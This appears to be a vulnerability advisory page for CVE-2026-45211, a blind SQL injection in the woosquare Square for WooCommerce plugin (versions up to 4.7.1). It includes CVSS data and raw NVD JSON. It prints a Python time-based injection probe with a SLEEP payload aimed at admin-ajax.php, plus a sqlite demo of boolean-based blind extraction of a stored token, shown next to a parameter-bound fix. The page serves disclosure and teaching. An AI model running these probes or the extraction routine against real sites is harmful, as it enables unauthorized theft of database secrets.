Security Vulnerability Report
CVE-2026-45211 CVSS 8.5 HIGH

CVE-2026-45211

Published: 2026-05-12 11:16:20
Last Modified: 2026-05-12 14:03:53

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability (CWE-89) in Saad Iqbal's APIExperts Square for WooCommerce (WordPress plugin slug: woosquare) allows Blind SQL Injection. This issue affects APIExperts Square for WooCommerce versions up to and including 4.7.1; no lower bound is published. The CVSS vector rates privileges required as Low, so exploitation requires an authenticated account with low privileges rather than an anonymous visitor, and the High confidentiality impact with changed scope is consistent with reading data from the site database through the blind injection. Sites running 4.7.1 or earlier should update to the latest release, since only versions through 4.7.1 are listed as affected.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

NVD has not yet published CPE configuration data for this CVE (vulnStatus: Deferred). Affected product according to the advisory:

APIExperts Square for WooCommerce (WordPress plugin slug: woosquare) <= 4.7.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC concept for CVE-2026-45211: a time-based blind SQL injection probe.
# The endpoint, request parameter and payload below are placeholders carried
# over from the original page; the advisory names no endpoint or parameter.
# The CVSS vector (PR:L) indicates the injection point needs an authenticated
# session, so supply the cookies of a low-privilege user on the Session.
import time

import requests


def timed_post(session, url, data, timeout=15):
    """POST `data` and return (elapsed_seconds, response), or (None, None) on error."""
    try:
        start = time.monotonic()
        r = session.post(url, data=data, timeout=timeout)
        return time.monotonic() - start, r
    except requests.RequestException as e:
        print(f"Error: {e}")
        return None, None


def check_sqli(session, url, param, payload, benign="1", delay=5):
    """Return True when the injected SLEEP() delays the response by roughly
    `delay` seconds relative to a benign request (time-based blind indicator)."""
    base, _ = timed_post(session, url, {param: benign})
    if base is None:
        return False
    elapsed, _ = timed_post(session, url, {param: payload})
    if elapsed is None:
        return False
    # Compare against the baseline so a slow server is not mistaken for a hit.
    return elapsed - base >= delay * 0.8


if __name__ == "__main__":
    target = "http://example.com/wp-admin/admin-ajax.php"  # placeholder
    vulnerable_param = "order_id"  # placeholder
    # If the database pauses for 5 seconds, the payload reached the query.
    payload = "1' AND (SELECT SLEEP(5))-- -"
    s = requests.Session()
    # s.cookies.update({...})  # authenticated WordPress session cookies go here
    if check_sqli(s, target, vulnerable_param, payload):
        print("[+] Vulnerability indicator detected (response delayed).")
    else:
        print("[-] Not vulnerable, or the payload/endpoint did not reach the query.")
```
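To make concrete what "blind" injection means here and what the fix looks like, the following is an added example that is not code from the woosquare plugin or from Patchstack. It simulates, with Python's sqlite3 module, a lookup that reveals only whether a record exists, in a vulnerable form that splices the request parameter into the SQL text and a hardened form that binds it as a parameter, then runs a boolean-based blind extraction against both to show that the vulnerable variant leaks a stored secret even though no query output is ever echoed. The table names, column names, row contents and the `square_access_token` option name are all constructed for the demonstration; the real plugin's schema and handlers are not known from this page.

```python
# Added illustration of CWE-89 (constructed; not the plugin's code).
import sqlite3


def make_db():
    """In-memory database with a constructed orders table and a secret to leak."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE orders (id INTEGER PRIMARY KEY, status TEXT);
        INSERT INTO orders VALUES (1, 'paid'), (2, 'refunded');
        CREATE TABLE options (name TEXT, value TEXT);
        INSERT INTO options VALUES ('square_access_token', 'sq0atp-EXAMPLE');
        """
    )
    return con


def lookup_vulnerable(con, order_id):
    """Vulnerable: the untrusted order_id is concatenated into the SQL text.
    Only True/False (does the order exist?) is returned: a blind oracle."""
    sql = "SELECT id FROM orders WHERE id = '" + order_id + "'"
    try:
        return con.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def lookup_hardened(con, order_id):
    """Hardened: the value is bound as a parameter, so it can only ever be data.
    (The WordPress equivalent is $wpdb->prepare() with %d/%s placeholders.)"""
    row = con.execute("SELECT id FROM orders WHERE id = ?", (order_id,)).fetchone()
    return row is not None


def blind_extract(oracle, table, column, where, max_len=32):
    """Recover `column` from `table` using only the True/False answer of
    `oracle(order_id)`. A binary search over the byte value costs about
    7 requests per character instead of one per candidate character."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # True iff the byte at `pos` is greater than `mid`. The closing
            # quote of the original query is re-balanced with AND '1'='1.
            probe = (
                f"1' AND (SELECT unicode(substr({column},{pos},1)) "
                f"FROM {table} WHERE {where}) > {mid} AND '1'='1"
            )
            if oracle(probe):
                lo = mid + 1
            else:
                hi = mid
        # Past the end of the string substr() yields '' and unicode('') is
        # NULL, so every probe is false and lo stays at 0: extraction is done.
        if lo == 0:
            break
        result += chr(lo)
    return result


if __name__ == "__main__":
    db = make_db()
    where = "name='square_access_token'"
    print("vulnerable:", blind_extract(lambda p: lookup_vulnerable(db, p), "options", "value", where))
    print("hardened:  ", repr(blind_extract(lambda p: lookup_hardened(db, p), "options", "value", where)))
```

The probe syntax is SQLite's; against WordPress's MySQL backend the same idea uses ASCII(SUBSTRING(...)) and, for a time-based variant, the SLEEP() payload shown in the PoC above. Note that the hardened handler receives exactly the same probe strings and returns False for all of them, which is why binding parameters (or $wpdb->prepare() in WordPress) rather than escaping by hand is the fix for this bug class.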

References

https://patchstack.com/database/Wordpress/Plugin/woosquare/vulnerability/wordpress-apiexperts-square-for-woocommerce-plugin-4-7-1-sql-injection-vulnerability?_s_id=cve (Patchstack advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-45211",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-12T11:16:20.487",
    "lastModified": "2026-05-12T14:03:52.757",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Saad Iqbal APIExperts Square for WooCommerce woosquare allows Blind SQL Injection.This issue affects APIExperts Square for WooCommerce: from n/a through <= 4.7.1."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L",
            "baseScore": 8.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 4.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-89"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://patchstack.com/database/Wordpress/Plugin/woosquare/vulnerability/wordpress-apiexperts-square-for-woocommerce-plugin-4-7-1-sql-injection-vulnerability?_s_id=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```